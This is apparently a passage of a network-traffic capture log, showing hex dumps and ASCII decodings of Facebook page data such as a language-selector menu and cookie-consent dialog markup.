                                                                                                                                                                                    Data Ascii: SZ7DqCB","ORfF6wp","147vx5A","0IBz+Hp","T0bnSpY","e3dyWaF","KBrreWM","R5w1rCJ","e9ANzw\/","eMkMxHZ","ttXpwpR","gIZgsXj"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog":{"
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20100INData Raw: 22 66 42 4e 79 7a 64 34 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 69 62 4e 44 63 63 78 22 2c 22 62 35 68 5c 2f 73 77 4c 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 54 69 74 6c 65 2e
                                                                                                                                                                                    Data Ascii: "fBNyzd4","jskFjuE","gitt+mK","pI0Ykx3","badRKqB","0IBz+Hp","ttXpwpR","gIZgsXj"],"be":1},"XUIDialogFooter.react":{"r":["R5w1rCJ","fBNyzd4","ibNDccx","b5h\/swL","jskFjuE","gitt+mK","pI0Ykx3","badRKqB","0IBz+Hp","ttXpwpR","gIZgsXj"],"be":1},"XUIDialogTitle.
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20101INData Raw: 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73 77 69 74 63 68 65 64 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 22 2c 22 6e 6f 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 30 76 41 6e 42 48 65 63 72 74 4a 70 47 78 41 34 74 76 65 71 38 31 37 64 39 69 67 4d 6c 4d 6e 6c 77 68 70 68 48 6a 6f 65 61 64 50 54 66 67 6b 73 46 46 64 48 4d 75 4c 35 76 36 6a 36 64 74 33 51 72 53 70 74 4c 54 32 39 44 44 35
                                                                                                                                                                                    Data Ascii: ts_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT0vAnBHecrtJpGxA4tveq817d9igMlMnlwhphHjoeadPTfgksFFdHMuL5v6j6dt3QrSptLT29DD5
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20103INData Raw: 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 53 30 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 72 42 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 73 51 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 59 70 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 34 7a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 68 43 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 30 4e 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 64 6d 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 65 73 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30
                                                                                                                                                                                    Data Ascii: p_3310c079_0_a_S0","__markup_3310c079_0_b_rB","__markup_3310c079_0_c_sQ","__markup_3310c079_0_d_Yp","__markup_3310c079_0_e_4z","__markup_3310c079_0_f_hC","__markup_3310c079_0_g_0N","__markup_3310c079_0_h_dm","__markup_3310c079_0_i_es","__markup_3310c079_0
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20104INData Raw: 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 46 55 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 4c 41 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 4a 47 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 2c 22
                                                                                                                                                                                    Data Ascii: :{"__m":"__markup_3310c079_0_4_FU"},"label":"English (US)","title":"","className":"headerItem"},{"class":"headerItem","value":"es_LA","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_5_JG"},"label":"Espa\u00f1ol","
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20106INData Raw: 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 73 51 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 6c 73 6b 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 42 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74
                                                                                                                                                                                    Data Ascii: ","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_c_sQ"},"label":"Polski","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_BR","selected":false,"ctor":{"__m":"MenuSelectableIt
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20107INData Raw: 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 63 73 5f 43 5a 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 61 7a 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75 30 31 36 31 74 69 6e 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72
                                                                                                                                                                                    Data Ascii: abel":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_k_az"},"label":"\u010ce\u0161tina","title":"","className":"header
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20108INData Raw: 5f 6f 5f 6c 72 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 69 5f 49 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 73 7a 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c
                                                                                                                                                                                    Data Ascii: _o_lr"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","value":"hi_IN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_p_sz"},"label":"\u0939\u093f\
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20110INData Raw: 69 62 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 79 61 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 64 69 22 2c 22 6d 61 78 68 65 69 67 68 74 22 3a 35 30 30 2c 22 74 68 65 6d 65 22 3a 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 49 50 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64
                                                                                                                                                                                    Data Ascii: ib"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_ya","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className":"_57di","maxheight":500,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_IP",["DialogX","LayerFad
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20111INData Raw: 22 3a 22 6c 65 66 74 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 62 65 6c 6f 77 22 7d 5d 2c 32 5d 5d 2c 22 6d 61 72 6b 75 70 22 3a 5b 5b 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 6c 44 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 6c 6c 20 5f 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 61 69 73 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 7a 74 5c 22 3e 5c 75 30 30 33 43 61 20 72 6f 6c
                                                                                                                                                                                    Data Ascii: ":"left","position":"below"}],2]],"markup":[["__markup_9f5fac15_0_0_lD",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9pll _50f4\">\u003Cdiv class=\"_9xl2\">\u003Cdiv class=\"_aisf\">\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_zt\">\u003Ca rol
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20113INData Raw: 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73
                                                                                                                                                                                    Data Ascii: have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our services for you, we us
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20114INData Raw: 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 33 75 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30
                                                                                                                                                                                    Data Ascii: cs, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_3u\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u00
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20116INData Raw: 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74
                                                                                                                                                                                    Data Ascii: \/p>\u003C\/div>\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vt
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20117INData Raw: 20 61 64 73 20 79 6f 75 20 6d 61 79 20 62 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 73 65 65 69 6e 67 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65
                                                                                                                                                                                    Data Ascii: ads you may be interested in seeing. You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad pre
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20119INData Raw: 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 4d 65 74 61 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63
                                                                                                                                                                                    Data Ascii: \/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Meta and other participating companies through the \u003Ca href=\"https:\/\/l.facebook.c
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20120INData Raw: 33 34 32 35 0d 0a 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 45 75 72 6f 70 65 2c 20 6f 72 20 74 68 72 6f 75 67 68 20 79 6f 75 72 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 20 73 65 74 74 69 6e 67 73 2c 20 69 66 20 79 6f 75 20 61 72 65 20 75 73 69 6e 67 20 41 6e 64 72 6f 69 64 2c 20 69 4f 53 20 31 33 20 6f 72 20 61 6e 20 65 61 72 6c 69 65 72 20 76 65 72 73 69 6f 6e 20 6f 66 20 69 4f 53 2e 20 50 6c 65 61 73 65 20 6e 6f 74 65 20 74 68 61 74 20 61 64 20 62 6c 6f 63 6b 65 72 73 20 61 6e 64 20 74 6f 6f 6c 73 20 74 68 61 74 20 72 65 73 74 72 69 63 74 20 6f 75 72 20 63 6f 6f 6b 69 65 20 75 73 65 20 6d 61 79 20 69 6e 74 65 72 66 65 72 65 20 77 69 74 68 20 74 68 65 73 65 20 63 6f 6e
                                                                                                                                                                                    Data Ascii: 3425Digital Advertising Alliance\u003C\/a> in Europe, or through your mobile device settings, if you are using Android, iOS 13 or an earlier version of iOS. Please note that ad blockers and tools that restrict our cookie use may interfere with these con
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20121INData Raw: 6b 38 71 6f 7a 56 43 4e 4d 4a 78 66 4a 43 79 31 30 30 65 50 66 39 4f 59 52 71 4b 50 55 33 46 32 4c 77 7a 74 37 7a 43 7a 72 38 31 56 36 72 4f 4f 6a 6b 64 6e 71 30 34 41 4f 6f 66 4f 39 4e 41 6d 52 54 65 4f 4a 6f 5a 57 4a 2d 6f 6c 50 55 42 56 79 35 4f 71 71 63 31 39 74 4d 33 49 65 61 68 39 58 63 69 44 79 4e 52 59 44 73 49 68 33 4b 48 76 56 68 31 78 54 61 34 49 49 66 53 6b 37 50 36 65 6b 52 42 32 77 4e 76 6d 73 7a 56 4d 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 5c 22 3e 45 75 72 6f 70 65 61 6e 20 49 6e 74 65 72 61 63 74 69 76 65 20 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30
                                                                                                                                                                                    Data Ascii: k8qozVCNMJxfJCy100ePf9OYRqKPU3F2Lwzt7zCzr81V6rOOjkdnq04AOofO9NAmRTeOJoZWJ-olPUBVy5Oqqc19tM3Ieah9XciDyNRYDsIh3KHvVh1xTa4IIfSk7P6ekRB2wNvmszVM\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"async\">European Interactive Digital Advertising Alliance\u0
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20123INData Raw: 32 35 32 46 61 6e 73 77 65 72 5c 75 30 30 32 35 32 46 39 35 36 34 37 26 61 6d 70 3b 68 3d 41 54 30 4b 6b 68 52 63 78 65 67 2d 5a 36 78 6f 51 69 38 45 65 68 57 6b 55 64 33 77 71 35 6b 41 32 41 4e 5a 31 32 53 43 49 76 59 4b 41 4b 53 59 6f 41 6e 59 70 75 5a 4c 65 55 5f 64 31 75 6e 6c 66 66 6f 49 4c 73 59 31 72 6b 30 5a 34 6f 53 4c 39 55 77 74 59 52 43 73 78 33 4e 54 51 53 5a 53 55 31 6a 50 34 67 45 58 70 4b 4e 36 5f 2d 44 55 30 51 63 68 6b 75 5f 46 41 73 50 63 4c 49 6f 5a 31 78 32 63 6b 4f 7a 57 42 2d 69 6a 6b 44 41 64 51 6c 6a 71 5a 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 47 6f 6f 67 6c 65 20 43
                                                                                                                                                                                    Data Ascii: 252Fanswer\u00252F95647&amp;h=AT0KkhRcxeg-Z6xoQi8EehWkUd3wq5kA2ANZ12SCIvYKAKSYoAnYpuZLeU_d1unlffoILsY1rk0Z4oSL9UwtYRCsx3NTQSZSU1jP4gEXpKN6_-DU0Qchku_FAsPcLIoZ1x2ckOzWB-ijkDAdQljqZw\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Google C
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20124INData Raw: 47 36 79 48 4a 64 5f 37 76 52 70 6a 5a 70 67 4e 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 53 61 66 61 72 69 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 61 70 70 6c 65 2e 63 6f 6d 5c 75 30 30 32 35 32 46 65 6e 2d 75 73 5c 75 30 30 32 35 32 46 48 54 32 30 31 32 36 35 26 61 6d 70 3b 68 3d 41 54 32 69
                                                                                                                                                                                    Data Ascii: G6yHJd_7vRpjZpgNg\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Safari\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fsupport.apple.com\u00252Fen-us\u00252FHT201265&amp;h=AT2i
                                                                                                                                                                                    2023-01-05 08:01:25 UTC20126INData Raw: 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 2d 61 63 63 65 70 74 2d 62 75 74 74 6f 6e 5c 22 20 74 69 74 6c 65 3d 5c 22 41 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 61 6e 64 20 6f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 22 20 74 79 70 65 3d 5c 22 73 75 62 6d 69 74 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 65 5f 68 56 5c 22 3e 41 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 61 6e 64 20 6f 70 74 69 6f 6e 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 22 7d 2c 39 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 